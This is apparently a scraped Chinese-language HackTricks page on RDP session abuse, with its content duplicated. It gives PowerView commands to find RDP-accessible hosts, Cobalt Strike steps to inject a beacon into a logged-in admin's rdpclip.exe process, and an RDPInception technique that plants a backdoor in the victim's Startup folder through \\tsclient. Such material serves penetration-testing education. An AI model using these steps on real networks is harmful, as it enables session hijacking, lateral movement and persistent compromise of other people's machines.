RDP Sessions Abuse

上一页Privileged Groups 下一页Resource-based Constrained Delegation

最后更新于1年前

RDP Sessions Abuse

从零开始学习 AWS 黑客技术，成为专家 ！

支持 HackTricks 的其他方式：

如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版的 HackTricks，请查看!
获取
探索，我们的独家收藏品
加入 💬 或或在 Twitter 🐦 上关注我们**。**
通过向和 github 仓库提交 PR 来分享您的黑客技巧。

RDP 进程注入

如果外部组在当前域中的任何计算机上具有RDP 访问权限，攻击者可以入侵该计算机并等待用户。

一旦用户通过 RDP 访问，攻击者可以转向该用户的会话并滥用其在外部域中的权限。

# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
...
4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user

RDPInception

如果用户通过RDP访问一台等待攻击者的机器，攻击者将能够在用户的RDP会话中注入一个信标，如果受害者在通过RDP访问时挂载了他的驱动器，攻击者可以访问它。

在这种情况下，您可以通过在启动文件夹中写入后门来妥协受害者的原始计算机。

# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
...
4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local

# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c

Size     Type    Last Modified         Name
----     ----    -------------         ----
dir     02/10/2021 04:11:30   $Recycle.Bin
dir     02/10/2021 03:23:44   Boot
dir     02/20/2021 10:15:23   Config.Msi
dir     10/18/2016 01:59:39   Documents and Settings
[...]

# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe

上一页Privileged Groups 下一页Resource-based Constrained Delegation

最后更新于1年前

从零开始学习 AWS 黑客技术，成为专家 ！

支持 HackTricks 的其他方式：

如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版的 HackTricks，请查看!
获取
探索，我们的独家收藏品
加入 💬 或或在 Twitter 🐦 上关注我们**。**
通过向和 github 仓库提交 PR 来分享您的黑客技巧。

RDP 进程注入

如果外部组在当前域中的任何计算机上具有RDP 访问权限，攻击者可以入侵该计算机并等待用户。

一旦用户通过 RDP 访问，攻击者可以转向该用户的会话并滥用其在外部域中的权限。

# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
...
4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user

查看本页中使用其他工具窃取会话的其他方法

RDPInception

在这种情况下，您可以通过在启动文件夹中写入后门来妥协受害者的原始计算机。

# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
...
4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local

# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c

Size     Type    Last Modified         Name
----     ----    -------------         ----
dir     02/10/2021 04:11:30   $Recycle.Bin
dir     02/10/2021 03:23:44   Boot
dir     02/20/2021 10:15:23   Config.Msi
dir     10/18/2016 01:59:39   Documents and Settings
[...]

# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe

从零开始学习AWS黑客技术，成为专家 ！

支持HackTricks的其他方式：